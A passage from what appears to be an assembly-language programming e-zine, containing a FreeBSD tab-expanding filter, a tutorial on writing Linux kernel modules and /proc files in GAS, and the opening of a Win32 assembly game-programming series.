pushing an extra DWORD before invoking int 80h. The value pushed is
irrelevant. In my modification to his code, I simply pushed EAX and invoked
int 80h. Then I added an extra four bytes to ESP. I already had to increase it
anyway because int 80h uses the C calling convention of receiving parameters
on the stack and leaving them there. It worked without a hitch.

I learned from his code that the value in EAX determines which system call
int 80h makes. A list of these can be found in the C include file
<sys/syscall.h>.
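
For comparison, the same numbers can be used from C through the syscall()
library function, which takes the call number first and the arguments after
it. The sketch below is only an illustration of that idea; the helper name
raw_write is hypothetical, and SYS_write has a different numeric value on
different systems.

```c
#define _GNU_SOURCE             /* exposes syscall() on glibc; harmless elsewhere */
#include <assert.h>
#include <string.h>
#include <sys/syscall.h>        /* SYS_write and the other call numbers */
#include <unistd.h>             /* syscall() */

/* Write text to the given descriptor by system call number instead of
   going through the write() wrapper. Returns the number of bytes written,
   or -1 on error. */
long raw_write(int fd, const char *text)
{
    assert(text != NULL);
    return syscall(SYS_write, fd, text, strlen(text));
}
```

Calling raw_write(1, "Hello, World\n") sends the string to stdout; the
assembly version loads the same number into EAX by hand.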

I then decided to experiment with his code a bit further, and create
something that actually does some work.

A typical Unix program is a filter which reads its input from stdin, writes
its output to stdout, and sends error messages to stderr. I decided to produce
such a filter for this article. Because I used tabs in my source code and
needed to convert them to spaces for this article, I made the filter convert
tabs to spaces. Because I started writing it under Windows and finished it
under Unix, I also made the filter strip any carriage returns.

It would be more useful if it could accept command line parameters, so you
could decide how many spaces a tab should expand to. Alas, I have no idea
where to find the command line under FreeBSD. If you know, please email me at
adam@.... For now, the program simply assumes a tab stop is at every 8th
position.

The program uses ESI as a counter of where on the line it is. To calculate the
number of blanks to insert, it moves ESI to EAX, negates EAX, ands it with
seven, and adds 1. This works very well. Suppose you are at the beginning of
the line, i.e., at the first position. So, you turn 1 into -1, i.e.,
0FFFFFFFFh. AND it with 7, and you get 7. Increase that, and you know you need
to write 8 spaces.
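
The same negate, AND, and add-one step can be written in C to check a few
more positions. This is only a sketch of the arithmetic described above; the
function name spaces_for_tab is made up for illustration.

```c
#include <assert.h>

/* column is the 1-based position of the tab character on the line (the
   value kept in ESI). Returns how many spaces replace the tab when tab
   stops fall at every 8th position. */
unsigned spaces_for_tab(unsigned column)
{
    assert(column >= 1);
    return ((0u - column) & 7u) + 1u;
}
```

A tab in column 1 becomes 8 spaces, a tab in column 2 becomes 7, and a tab in
column 8 becomes a single space, so the next character always lands in column
9, 17, and so on.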

I also used EDI as the pointer to the read/write buffer. I could have just
pushed its offset (push dword buffer) every time, but pushing a register
produces less code and is probably faster.

I chose ESI and EDI to hold persistent values (i.e., values that need to
survive the system call) because Unix system software uses the C convention of
preserving these two registers (as well as EBX and EBP).

In my first version I started the program with a PUSHAD and ended it with a
POPAD. This is certainly needed in Windows programs: An assembly language
program will crash Windows if it returns to Windows with any of the four
aforementioned registers modified.

Then I thought that surely FreeBSD would not allow such a serious security
hole in the system. I removed the PUSHAD and the POPAD, and the program worked
without a hitch.


The result is below.

;---------------------------------------------------------------------------
;       File: tab2sp.asm
;
;       A sample assembly language program for FreeBSD.
;       It converts tabs to spaces. Nothing new, expand
;       already does that and with more options.
;
;       But it illustrates reading from stdin, and writing
;       to stdout and stderr in assembly language.
;
;       05-May-2000
;       Copyright 2000 G. Adam Stanislav
;       All rights reserved
;
;       http://www.whizkidtech.net/
;       http://www.redprince.net/
;
;       Assemble with nasm:
;
;       nasm -f elf tab2sp.asm
;       ld -o tab2sp tab2sp.o

section .data
buffer  times 8 db      ' '
errread db      'TAB2SP: Error reading input', 0Ah
erlen   equ     $-errread
align 4, db 0
errwrite        db      'TAB2SP: Error writing output', 0Ah
ewlen   equ     $-errwrite

section .text
; ld expects every program to start with _start
global  _start
_start:

         ; We use EDI and ESI to store persistent data
         ; because syscall will not modify them.
         mov     edi, buffer             ; EDI = address of buffer
         sub     esi, esi                ; ESI = counter

         ; NOTE:
         ;
         ; Because int 80h expects to be within a separate
         ; procedure, we need to push a fake return address
         ; before invoking it. It can be anything, so we
         ; just push EAX.

.read:
         sub     eax, eax
         inc     al
         push    eax                     ; size of "string"
         push    edi                     ; address of buffer
         dec     al
         push    eax                     ; stdin = 0
         push    eax                     ; "return address"
         mov     al, 3                   ; SYS_read
         int     80h                     ; syscall
         add     esp, byte 16            ; clean the stack after reading

         or      eax, eax
         je      .quit                   ; end of file reached
         js      .rerror                 ; read error...

         ; Decide what to do:
         ;
         ; If the byte is a carriage return, ignore it.
         ; If the byte is a newline, initialize ESI = 0.
         ; If the byte is a tab, convert it to spaces.
         ; Otherwise, just write it.

         mov     dl, [edi]
         cmp     dl, 0Dh                 ; carriage return
         je      .read
         cmp     dl, 0Ah                 ; new line
         je      .newline
         inc     esi
         cmp     dl, 09h                 ; tab
         jne     .write

         ; It's a tab. Expand it.
         mov     byte [edi], ' '
         mov     eax, esi
         neg     eax
         and     eax, 7
         add     esi, eax
         inc     eax
         jmp     short .write

.newline:
         sub     esi, esi

.write:
         push    eax                     ; size of "string"
         push    edi                     ; address of buffer
         sub     eax, eax
         inc     al
         push    eax                     ; stdout = 1
         push    eax                     ; "return address"
         mov     al, 4                   ; SYS_write
         int     80h                     ; system call
         add     esp, byte 16
         or      eax, eax
         jns     short .read

         push    dword ewlen
         push    dword errwrite
         jmp     short .err

.rerror:
         push    dword erlen
         push    dword errread
.err:
         sub     eax, eax
         mov     al, 2                   ; stderr = 2
         push    eax
         push    eax                     ; "return address"
         add     al, al                  ; SYS_write
         int     80h
         add     esp, byte 16

.quit:
         sub     eax, eax                ; EAX = 0
         push    eax                     ; exit status
         inc     eax                     ; SYS_exit
         push    eax                     ; "return address"
         int     80h
         ; Program ends here.
;--------------------------------------------------------------------------
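
For readers who want to check the logic away from the assembler, here is a
rough C rendering of the same decisions the listing makes for each byte. It
is a sketch, not a translation: it works on memory buffers instead of making
system calls, and the function name tab2sp and its parameters are assumptions
made for this example.

```c
#include <assert.h>
#include <stddef.h>

/* Expand tabs and drop carriage returns, following the same rules as
   tab2sp.asm. out must have room for 8 * n bytes. Returns the number of
   bytes stored in out. */
size_t tab2sp(const char *in, size_t n, char *out)
{
    size_t column = 0;          /* plays the role of ESI */
    size_t used = 0;

    assert(in != NULL && out != NULL);
    for (size_t i = 0; i < n; i++) {
        char c = in[i];

        if (c == '\r')
            continue;           /* ignore carriage returns */
        if (c == '\n') {
            column = 0;         /* a new line restarts the count */
            out[used++] = c;
            continue;
        }
        column++;
        if (c == '\t') {
            /* spaces needed beyond the first one */
            size_t extra = ((size_t)0 - column) & 7;

            column += extra;
            for (size_t k = 0; k <= extra; k++)
                out[used++] = ' ';
        } else {
            out[used++] = c;
        }
    }
    return used;
}
```

Feeding it the seven bytes "a\tb\r\n\tc" yields 19 bytes: 'a', seven spaces,
'b', a newline, eight spaces, and 'c'.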



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                      Loadable Kernel Modules
                                                      by mammon_



If there is one area in linux that is sure to attract assembly language
coders, it is the coding of loadable kernel modules; after all, asm
programmers aren't known for waiting around in Ring 3 space for the CPU to
assign their process some resources.

Kernel modules are Ring 0 programs that are dynamically linked into a running
kernel; they require LKM support in the kernel [ CONFIG_MODULES ]. Each kernel
ships with a given number of kernel modules, as most device drivers are
compiled as such; the modules are located in /lib/modules/kernel_version#.
Modules are managed with the commands insmod [load module], modprobe [load
module and all modules it depends on], lsmod [list loaded modules], and rmmod
[unload module]; information on loaded modules can also be obtained from the
/proc file system, e.g. /proc/modules.


Kernel Land
-----------
It need hardly be said that kernel-space programming is different from
user-space programming. For starters, simple bugs can panic the kernel, or
render kernel subsystems unreliable if not actually inoperable. It is
advisable, when developing kernel modules, to become well-acquainted with the
"Magic SysRq Key" commands.

There is no main function. Kernel modules must export the init_module and
cleanup_module routines; these will be called by the kernel when the module is
loaded and unloaded. The rest of the kernel module will generally consist of
callback routines which are executed in response to system events [e.g.
ioctl() calls, reading of /proc files, syscalls, interrupts].

The standard C libraries are also unavailable -- they are far away, in the
user-space shared by all normal, well-behaved programs. The only external
routines that a kernel module can call are those listed in the kernel symbol
table [which can be browsed via /proc/ksyms] and the INT 80 syscalls. Some
basic C-style routines are provided by the kernel, and are prototyped in
$INCLUDE/linux/kernel.h:
      simple_strtol(const char *,char **,unsigned int);
      sprintf(char * buf, const char * fmt, ...);
      vsprintf(char *buf, const char *, va_list);
      get_option(char **str, int *pint);
      memparse(char *ptr, char **retptr);
      printk(const char * fmt, ...);
Note that the standard kernel routines are documented in section 9 of the
manual, and can be browsed with
      ls -1 /usr/man/man9 | cut -d. -f1
As mentioned in a previous article, the syscalls are listed in
/usr/include/asm/unistd.h .

Finally, accessing user-space memory is not easy. In C, there are macros
provided for this -- get_user(), put_user(), copy_from_user(), copy_to_user()
... all defined in $INCLUDE/asm/uaccess.h -- and these boil down to inline
assembler routines that can be accessed, somewhat awkwardly, from routines
listed in the kernel symbol table [e.g. __get_user_1 and so on]. In general,
it is best to leave user/kernel-space interaction to /proc and /dev files.


Developing Kernel Modules
-------------------------
What does all of this mean in terms of assembly language? Essentially, asm
kernel modules will have the same problems as C kernel modules, with the added
bonus that none of the C macros for kernel-mode programming will work.

When programming kernel modules, one is more or less restricted to using the
GAS assembler. NASM can be made to work, but by default it produces object
files in a format that the kernel module loader cannot recognize [note:
RedPlait has produced a patch for NASM to fix this; in addition, it is
possible to write a libBFD post-processor which will re-assemble the sections
in the appropriate order]. Information on GAS invocation and syntax can be
obtained from the 'as' manpage and info file, and the GAS preprocessor is
documented in the 'gasp' info page. Note that a particular info node can be
reached directly by appending the sequence of menu selections to the command;
thus
     info as Machine i386 i386-Syntax
would load the 'as' info section for i386 syntax details.

Kernel modules are unlinked object files -- they are linked to the kernel
dynamically, and so should not be run through ld. Using gcc, a kernel module
can be compiled with
     gcc -c filename
assuming that the file extension is .s or .S . Gcc will produce a .o output
file which may be loaded using 'insmod' and unloaded using 'rmmod'. The
compilation/test cycle for a linux kernel module is essentially
     gcc -c asm_module.s
     insmod asm_module
     lsmod
     rmmod asm_module
Note that modules which cannot be initialized or unloaded will remain loaded
until reboot, thus preventing another module with the same name from being
loaded. In order to minimize reboots, it helps to symlink a number of 'test'
filenames to the original object file, so that 'asm_module1.o',
'asm_module2.o', and so on all point to 'asm_module.o'.


Debugging kernel modules can be quite a chore. While kernel-mode debuggers
exist for linux, it is often more expedient to use primitive "printf"
debugging techniques and core file analysis. In the former case, the linux
kernel provides the function "printk()", which is the kernel-mode equivalent
of printf(); the one notable difference is that the format string should begin
with a 'priority code' indicating how syslog should handle the message. The
priority codes are:
     <0> Kernel Emergency
     <1> Kernel Alert
     <2> Kernel Critical Condition
     <3> Kernel Error
     <4> Kernel Warning
     <5> Kernel Notice
     <6> Kernel Info
     <7> Kernel Debug
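
To make the layout of the prefix concrete, the following user-space sketch
pulls the priority digit out of a printk-style format string. It is not the
kernel's own parsing code; the function name message_priority is hypothetical
and exists only to show where the code sits in the string.

```c
#include <assert.h>
#include <stddef.h>

/* Return the priority (0-7) encoded at the start of a printk-style format
   string such as "<1>text", or -1 if no priority code is present. */
int message_priority(const char *fmt)
{
    assert(fmt != NULL);
    if (fmt[0] == '<' && fmt[1] >= '0' && fmt[1] <= '7' && fmt[2] == '>')
        return fmt[1] - '0';
    return -1;
}
```

A string beginning with "<1>" is therefore a Kernel Alert, while a string
with no prefix yields -1 here.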

In addition, when a kernel module 'crashes', the kernel writes an 'oops'
report to the system log and console. This is essentially a stripped-down core
file giving the registers and stack state at the moment of the crash; it can
be saved to a file and loaded with the ksymoops utility to make the report
more coherent.

One of the best tools for debugging assembly language kernel modules is gcc
itself. If the module --or the problematic portion thereof-- can be written
correctly in C, a GAS version can be produced by compiling the module with
     gcc -S filename
This will produce an assembly-language version of the program, loaded with
GAS preprocessor directives. This file can be cleaned up and compared against
the hand-tooled assembly language version in order to judge the effects of
C macros, data alignment, and sections.


Hello Kernel
------------
As usual, it is best to start with the simplest module possible in order to
demonstrate the absolute basics of LKM programming. Other than the use of init
and cleanup functions, this module should not present any surprises:

#---------------------------------------------------------------------Asm_mod.s
.globl init_module
.globl cleanup_module
.extern printk

.text
.align 4
init_module:
      pushl $strLoad
      call printk
      popl %eax
      xorl %eax, %eax
      ret

cleanup_module:
      pushl $strUnload
      call printk
      popl %eax
      xorl %eax, %eax
      ret


.section .rodata
.align 32
strLoad:
.ascii "<1> Asm Module Loaded!\n\0"
strUnload:
.ascii "<1> Asm Module Unloaded\n\0"

.section .modinfo
__module_kernel_version:
.ascii "kernel_version=2.2.15\0"
#---------------------------------------------------------------------------EOF

As you can see, this program does nothing special -- it simply outputs an
alert when the module is loaded or unloaded. Note the .modinfo section of the
program; this is where the module specifies which kernel it was compiled for.
In C, a macro determines this based on a constant in the kernel header files;
in assembly, you will have to specify the kernel version by hand or with a
Makefile. Also note the .rodata section -- this is where the kernel expects to
find string references, and one can expect a lot of segmentation faults if the
strings are placed in .data instead.


Using the /proc Filesystem
--------------------------
The trend in linux, as well as in other Unixes, is to provide runtime access
to kernel-space data through the /proc file system. Linux system tweakers will
no doubt be familiar with cat'ing /proc files to check the status of kernel
variables, and echo'ing values to those files in order to change the values of
such variables. The /proc filesystem is a handy mechanism for interfacing with
kernel modules without the relative complexity of a device file and an ioctl()
interface.

Creating an entry in the /proc file system consists of the following steps:
      1. Prepare a proc_dir_entry struct to describe the /proc file
      2. Register the /proc file to create it
      3. Unregister the /proc file when finished with it

The most important component of this process is obviously the proc_dir_entry
structure; it is defined in $INCLUDE/linux/proc_fs.h:
     struct proc_dir_entry {
         unsigned short low_ino;           //inode # of the /proc file
         unsigned short namelen;           //length of filename
         const char *name;                 //pointer to filename string
         mode_t mode;                      //Access mode [permissions]
         nlink_t nlink;                    //# of links to the file
         uid_t uid;                        //UID of file owner
         gid_t gid;                        //GID of file owner
         unsigned long size;               //Size of the file
         struct inode_operations * proc_iops;
         struct file_operations * proc_fops;
         get_info_t *get_info;             //Function handling file reads
         struct module *owner;
         struct proc_dir_entry *next, *parent, *subdir;
         void *data;                       //pointer to 'user-defined' data
         read_proc_t *read_proc;
         write_proc_t *write_proc;
         unsigned int count; /* use count */
         int deleted;        /* delete flag */
         kdev_t  rdev;
     };

The last 5 members of the structure are not defined in the proc_dir_entry man
page, and do not appear to be used; however, as demonstrated in the sample
code, space must be reserved for them.

In most cases, the majority of these structure members can be set to NULL in
order to have them filled with default values. The members that should
normally be set to NULL include low_ino, uid, gid, size, *proc_iops,
*proc_fops, *owner, *next, *parent, *subdir, and *data. This leaves the
following members to be filled by the program:
      namelen   -- length of *name string, without the terminating \0
      *name     -- .rodata string containing the name of the /proc file
      mode      -- access permissions for the file
      nlink     -- 1 for normal files, 2 for directories
      *get_info -- callback routine for reads to the /proc file
Note that *get_info() is called for normal /proc file reads, e.g. `cat
/proc/modules`. In order to handle more advanced operations such as writes,
links, and so forth, an inode_operations and a file_operations structure need
to be set up.
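
As a quick check on the mode member, the permission bits for a regular file
that everyone may read can be combined in C from the constants in
<sys/stat.h>. This is a user-space sketch only; the function name
read_only_file_mode is made up for the example.

```c
#define _XOPEN_SOURCE 700       /* make S_IFREG visible under strict modes */
#include <assert.h>
#include <sys/stat.h>           /* S_IFREG, S_IRUSR, S_IRGRP, S_IROTH */
#include <sys/types.h>          /* mode_t */

/* Mode for a regular file that owner, group, and others may read and that
   no one may write or execute. */
mode_t read_only_file_mode(void)
{
    mode_t mode = S_IFREG | S_IRUSR | S_IRGRP | S_IROTH;

    assert(S_ISREG(mode));
    return mode;
}
```

On linux the result is octal 0100444, which still fits in the 16-bit mode
field of the structure.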

The *get_info() function has the following prototype:
     int get_info(char *buffer, char **retBuf, off_t pos, int size);
where buffer is the buffer provided by the user-space program, size is the
size of that buffer, pos is the current position in the file [to support
multiple, sequential reads by the user-space program], and retBuf is a pointer
to a buffer which can be used in place of the supplied buffer [for example, if
size is too small]. When a return buffer is used, a pointer to the buffer is
stored in retBuf, and the size of the buffer is returned in eax.
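
A callback with the prototype above can be tried out in user space before it
is rewritten for the kernel. The sketch below is such a stand-in, not kernel
code: the name read_asm_proc_file is hypothetical, and it uses snprintf to
respect size, whereas kernel code of this era would typically call sprintf.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/types.h>          /* off_t */

/* User-space stand-in for a get_info callback: fill buffer with a fixed
   string and return the number of bytes stored. ret_buf and pos are
   accepted but unused, which is the simplest case. */
int read_asm_proc_file(char *buffer, char **ret_buf, off_t pos, int size)
{
    static const char text[] = "This /proc file has nothing to say\n";
    int len;

    (void)ret_buf;
    (void)pos;
    assert(buffer != NULL && size > 0);
    len = snprintf(buffer, (size_t)size, "%s", text);
    if (len >= size)
        len = size - 1;         /* output was truncated to fit */
    return len;
}
```

The return value is what a reader of the file would receive as the byte
count, so a 64-byte buffer gets the whole 35-byte string and an 8-byte buffer
gets the first 7 bytes.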

It is important to use stack frames in all kernel-mode callbacks. The
skeleton for a get_info function in GAS would be
     .globl get_info
     get_info:
         pushl %ebp
         movl %esp,%ebp
         ....
         movl %eax,20(%ebp)
         leave
         ret
The parameters will all be at offsets of %ebp, as the default return value [an
invisible fifth parameter that is always zero] demonstrates.

Registering and unregistering a proc file are fairly straightforward. The
proc_register command has the prototype
      proc_register(proc_dir_entry *parent, proc_dir_entry *child)
and always returns 0. The *parent structure must refer to a directory within
the /proc tree; the global symbols proc_root and proc_sys_root refer to the
directories /proc and /proc/sys, respectively. The child structure refers to
the /proc entry that is being created.

The proc_unregister command has the prototype
     proc_unregister(proc_dir_entry * parent, int inode);
and returns 0 only on success. The parent node will be the same as in the
proc_register call, while inode refers to the inode assigned to the /proc file
being unregistered. Note that the inode of a /proc file is specified in the
first member of the proc_dir_entry structure [low_ino]; if low_ino is 0 on
/proc file registration, an inode number is dynamically assigned and stored
there.


Hello Proc
----------
The following program will demonstrate the use of the get_info() function; it
creates a /proc file which, when read, will return a simple string in the
buffer provided by the user-space program.
#--------------------------------------------------------------------Asm_proc.s
.globl init_module
.globl cleanup_module
.globl ReadAsmProcFile
.globl procAsm
.extern printk
.extern sprintf
.extern proc_root
.extern proc_register
.extern proc_unregister

.text
.align 4
init_module:
     pushl %ebp
     movl %esp,%ebp
      pushl $strLoad
      call printk
      popl %eax
      pushl $procAsm
      pushl $proc_root
      call proc_register
      addl $0x8, %esp
      xorl %eax, %eax
      leave
      ret

cleanup_module:
     pushl %ebp
     movl %esp,%ebp
      pushl $strUnload
      call printk
      popl %eax
      movzwl procAsm, %eax
      pushl %eax
      pushl $proc_root
      call proc_unregister
      addl $0x8, %esp
      xorl %eax, %eax
      leave
      ret

ReadAsmProcFile:
     pushl %ebp
     movl %esp,%ebp
     pushl $strRead
     movl 8(%ebp),%eax
     pushl %eax
     call sprintf
     addl $8,%esp
     movl %eax,20(%ebp)
      leave
      ret


.section .modinfo
__module_kernel_version:
.ascii "kernel_version=2.2.15\0"

.section .rodata
.align 32
strName:       .ascii "AsmModule\0"
strLoad:       .ascii "<1> Asm Module Loaded!\n\0"
strUnload:          .ascii "<1> Asm Module Unloaded\n\0"
strRead:       .ascii "This /proc file has nothing to say\n\0"

.data
.align 32
#______________________File_Permissions
.equ S_IFREG, 0100000
.equ S_IRUSR, 00400
.equ S_IWUSR, 00200
.equ S_IXUSR, 00100
.equ S_IRGRP, 00040
.equ S_IWGRP, 00020
.equ S_IXGRP, 00010
.equ S_IROTH, 00004
.equ S_IWOTH, 00002
.equ S_IXOTH, 00001

#________________________________________proc_dir_entry structure
procAsm:
procAsm_low_ino:              .short         0
procAsm_name_length:          .short         9
procAsm_name:                 .long          strName
procAsm_mode:                 .short         S_IFREG | S_IRUSR | S_IRGRP | S_IROTH
procAsm_nlinks:               .short         1
procAsm_owner:                     .short         0
procAsm_group:                     .short         0
procAsm_size:                 .long          0
procAsm_operations:           .long          0
procAsm_read_proc:            .long          ReadAsmProcFile
                                    .zero     40
#________________________________________end proc_dir_entry

#---------------------------------------------------------------------------EOF
The /proc file can be read with the usual `cat /proc/AsmModule` command. It
should be noted that get_info() is executed when the file is opened; this
allows different behavior to be supplied for file opens, reads, and writes.
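
As a cross-check on the hand-built proc_dir_entry above, the following Python
sketch adds up the field widths exactly as they appear in the listing and
reports the byte offset of each one. The field names are taken from the
procAsm_* labels; the layout mirrors the listing only and is an assumption,
not something checked against the kernel headers.

```python
import struct

# Mode bits copied from the .equ lines of the listing (octal).
S_IFREG = 0o100000
S_IRUSR = 0o400
S_IRGRP = 0o040
S_IROTH = 0o004

# Field names and widths in the order they appear in the procAsm listing.
# H = 16-bit (.short), I = 32-bit (.long). This mirrors the listing only;
# it has not been checked against the kernel's own headers.
FIELDS = [
    ("low_ino", "H"), ("name_length", "H"), ("name", "I"),
    ("mode", "H"), ("nlinks", "H"), ("owner", "H"), ("group", "H"),
    ("size", "I"), ("operations", "I"), ("read_proc", "I"),
]


def field_offsets(fields):
    """Return {name: byte offset} for fields packed back to back."""
    offsets, position = {}, 0
    for name, code in fields:
        offsets[name] = position
        position += struct.calcsize("<" + code)
    return offsets


OFFSETS = field_offsets(FIELDS)
NAMED_SIZE = struct.calcsize("<" + "".join(code for _, code in FIELDS))
TOTAL_SIZE = NAMED_SIZE + 40          # plus the trailing ".zero 40"
MODE = S_IFREG | S_IRUSR | S_IRGRP | S_IROTH

if __name__ == "__main__":
    for name, offset in OFFSETS.items():
        print(f"{offset:3d}  {name}")
    print("mode =", oct(MODE), " total bytes =", TOTAL_SIZE)
```

The inode sits at offset 0 as a 16-bit value, which is why cleanup_module can
fetch it with a single `movzwl procAsm, %eax`.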


Further Reading
---------------
Programming Linux kernel modules, either in assembly or in C, is a
complicated and challenging field. The following online resources provide
vital information on kernel module programming.

"Linux Kernel Module Programming Guide", by Ori Pomerantz
        http://www.linuxdoc.org/LDP/lkmpg/mpg.html
        The 'classic' guide to LKM programming. This work is part of the
        Linux Documentation Project, and is available in most Linux
        distributions. Most LKM texts will assume you are familiar with the
        concepts presented in this one.

"(nearly) Complete Linux Loadable Kernel Modules", by pragmatic / THC
        http://thc.pimmel.com/files/thc/LKM_HACKING.html
        Based on the exploratory LKM hacking essays of Phrack 50 and 52,
        this treatise on LKM hacking is very thorough and very informative.
        The text contains an introduction to LKM programming and proceeds to
        cover kernel modules from the security and hacking viewpoints, with
        plenty of source code to back up the discussion. If you read or print
        out only one LKM guide, this should be it.

"Linux Kernel Hacker Documentation"
        http://jungla.dit.upm.es/~jmseyas/linux/kernel/hackers-docs.html
        This page contains links to a number of articles and books on Linux
        kernel-mode programming.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.............................................GAMING.CORNER
                                        Win32 ASM Game Programming - Part 1
                                        by Chris Hobbs


[This series of articles was first posted at GameDev.net and is now being
published here with the author's permission. Here is Chris Hobbs'
introduction to this particular article:

"A tutorial series on the development of a complete game, SPACE-TRIS, in
   pure ASM. This one covers the design document, code framework, and some
   Win32 ASM basics."

Visit his website at http://www.fastsoftware.com.
Preface, Html-to-Txt conversion and formatting by Chili ]



This is the article that I am sure all of you have been waiting ever so
patiently for ... a complete series on the development of a game, in pure
Assembly Language of all things. I know all of you are as excited about this
article as I am, so I will try to keep this introduction brief. Instead of
laying every single thing out for you in black and white, I will try to
answer a few of the questions that are asked most often, and the details
will appear as we progress ( I am making this up as I go, you know ).


What is this article about?
---------------------------
This article is actually part of a seven-article series on the development
of a complete game, SPACE-TRIS, in 100% assembly language. We will be
covering every aspect of game development that I can think of ... from
design and code framework to graphics and sound.


Who is this article for?
------------------------
This series is meant for anybody who wishes to learn something that they may
not have known before. Since the game is a relatively simple Tetris clone,
it is great for the beginner. Also, given the fact that not many people are
even aware that it is completely possible to write for Windows in assembly
language, it is great for the more advanced developers out there too.


What do I need?
---------------
The only requirement is the ability to read. However, if you wish to
assemble the source code, or participate in the challenge at the end of the
article series, you need a copy of MASM 6.12+. You can download a package
called MASM32 that will have everything that you need, and then some. Here
is the link:
     http://www.pbq.com.au/home/hutch/.


Why Assembly Language?
----------------------
Many of you are probably wondering why anybody in their right mind would
write in pure assembly language. Especially in the present, when optimizing
compilers are the "in" thing and everybody knows that VC++ is bug free,
right? Okay, I think I answered that argument ... but what about assembly
language being hard to read, non-portable, and extremely difficult to learn?
In the days of DOS these arguments were very valid ones. In Windows though,
they are simply myths left over from the good old days of DOS. I might as
well approach these one at a time.

First, assembly language is hard to read. But for that matter so is C, or
even VB. The readability results from the skill of the programmer and
his/her thoroughness at commenting the code. This is especially true of C++.
Which is easier to read: assembly code which progresses one step at a time
( e.g. move variable into a register, move a different variable into another
register, multiply ), or C++ code which can go through multiple layers of
inherited virtual functions? No matter what language you are in, commenting
is essential ... use it and you won't have any trouble reading source code.
Remember, just because you know what it means doesn't mean that everybody
else does also.

Second, the issue of portability. Granted, assembly language is not portable
to other platforms. There is a way around this, which allows you to write
for any x86 platform, but that is way beyond the scope of this article
series. A good 80-90% of the games written are for Windows. This means that
the majority of your code is specific to DirectX or the Win32 API, therefore
... you won't be porting without a huge amount of work anyway. So, if you
want a truly portable game, then don't bother with writing for DirectX at
all ... go get a multi-platform development library.

Finally, there comes the issue of Assembly Language being extremely
difficult to learn. Although there is no real way for me to prove to you
that it is easy, I can offer you the basics, in a few pages, which have
helped many people who had never seen a line of assembly language before to
learn it. Writing Windows assembly code, especially with MASM, is very easy.
It is almost like writing some C code. Give it a chance and I am certain
that you won't be disappointed.


Win32 ASM Basics
----------------
If you are already familiar with assembly language on the Windows platform,
you may want to skip this section. For those of you who aren't, this may be
a bit boring, but hang with it ... this is very important stuff. For this
discussion I will presume that you are at least familiar with the x86
architecture.

The first thing you need to understand is the instructions. There aren't
very many that you will be using often, so I will simply cover the ones that
we care about.


MOV
---
This instruction moves a value from one location to another. You can move an
immediate value into a register or memory, or move from register to
register, memory to register, or register to memory. You cannot move from
one memory location to another memory location.

Example:
         MOV     EAX, 30
         MOV     EBX, EAX
         MOV     my_var1, EAX
         MOV     DWORD PTR my_var, EAX

The first example moves the value 30 into the EAX register. The second
example moves the value in EAX into the EBX register. The third example
moves the value of EAX into the variable my_var1. The fourth example moves
the value of EAX into the memory at the address of my_var; the DWORD
specifier tells the assembler how much memory to move -- 1 byte ( BYTE ),
2 bytes ( WORD ), or 4 bytes ( DWORD ).
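
To see what the size specifier changes, here is a small Python model of a
store to memory. It is only an illustration: the store() helper is made up
for this sketch, and it assumes the usual x86 little-endian byte order.

```python
import struct


def store(memory, address, value, size):
    """Write the low `size` bytes of `value` at `address`, little-endian.

    Models MOV BYTE/WORD/DWORD PTR [address], value on x86.
    """
    formats = {1: "<B", 2: "<H", 4: "<I"}
    mask = (1 << (8 * size)) - 1
    struct.pack_into(formats[size], memory, address, value & mask)


if __name__ == "__main__":
    eax = 0x11223344
    for size, name in ((1, "BYTE"), (2, "WORD"), (4, "DWORD")):
        memory = bytearray(4)          # four zeroed bytes of "RAM"
        store(memory, 0, eax, size)
        print(name, [hex(byte) for byte in memory])
```

Only the DWORD store touches all four bytes; the BYTE and WORD stores leave
the rest of the variable alone, which is why the assembler has to know the
size.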


ADD & SUB
---------
These two instructions perform addition and subtraction.

Example:
         ADD     EAX, 30
         SUB     EBX, EAX

The examples simply add 30 to the EAX register and then subtract the new
value of EAX from the EBX register.


MUL & DIV
---------
These two instructions perform multiplication and division.

Example:
         MOV     EAX, 10
         MOV     ECX, 30
         MUL     ECX
         XOR     EDX, EDX
         MOV     ECX, 10
         DIV     ECX

The examples above first load EAX with 10 and ECX with 30. EAX is always the
default multiplicand, and you get to select the multiplier. After a
multiplication the answer is in EDX:EAX; the upper half only spills into EDX
if the value is too large to fit in the EAX register. Before performing a
divide you must first clear the EDX register, because the dividend is taken
from EDX:EAX; that is what the XOR instruction does, by performing an
Exclusive OR of EDX with itself. After the divide, the answer is in EAX,
with the remainder in EDX, if any exists.
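
The register traffic of the unsigned MUL and DIV can be modelled in a few
lines of Python. This is a sketch for checking your arithmetic, not a CPU
emulator; mul32() and div32() are names invented here.

```python
MASK32 = 0xFFFFFFFF


def mul32(eax, operand):
    """Unsigned MUL r/m32: returns (edx, eax) holding the 64-bit product."""
    product = (eax & MASK32) * (operand & MASK32)
    return (product >> 32) & MASK32, product & MASK32


def div32(edx, eax, operand):
    """Unsigned DIV r/m32: divides EDX:EAX, returns (quotient, remainder)."""
    if operand == 0:
        raise ZeroDivisionError("DIV by zero raises a divide error")
    dividend = (edx << 32) | eax
    quotient, remainder = divmod(dividend, operand)
    if quotient > MASK32:
        raise OverflowError("quotient does not fit in EAX")
    return quotient, remainder


if __name__ == "__main__":
    edx, eax = mul32(10, 30)           # MOV EAX,10 / MOV ECX,30 / MUL ECX
    print("after MUL: EDX =", edx, "EAX =", eax)
    eax, edx = div32(0, eax, 10)       # XOR EDX,EDX / MOV ECX,10 / DIV ECX
    print("after DIV: EAX =", eax, "EDX =", edx)
```

The overflow check in div32() shows why a stale value in EDX is dangerous:
the high half is part of the dividend, so the quotient may no longer fit in
EAX and the real instruction faults.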

Of course, there are many more instructions, but those should be enough to
get you started. We will probably only be using a few others, but they are
fairly easy to figure out once you have seen the main ones. Now we need to
deal with the calling convention. We will be using the Standard Call calling
convention since that is what the Win32 API uses. What this means is that we
push parameters onto the stack in right to left order, but we aren't
responsible for clearing the stack afterwards; the called function does
that. Everything will be completely transparent to you, however, as we will
be using the pseudo-op INVOKE to make our calls.
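
For the curious, the bookkeeping that INVOKE hides can be sketched with a
Python list standing in for the stack. The function names are hypothetical
and the "return address" is just a placeholder string; the point is only the
push order and who removes the arguments.

```python
def call_stdcall(stack, callee, *args):
    """Caller: push the arguments right to left, then the return address."""
    for value in reversed(args):
        stack.append(value)
    stack.append("return address")
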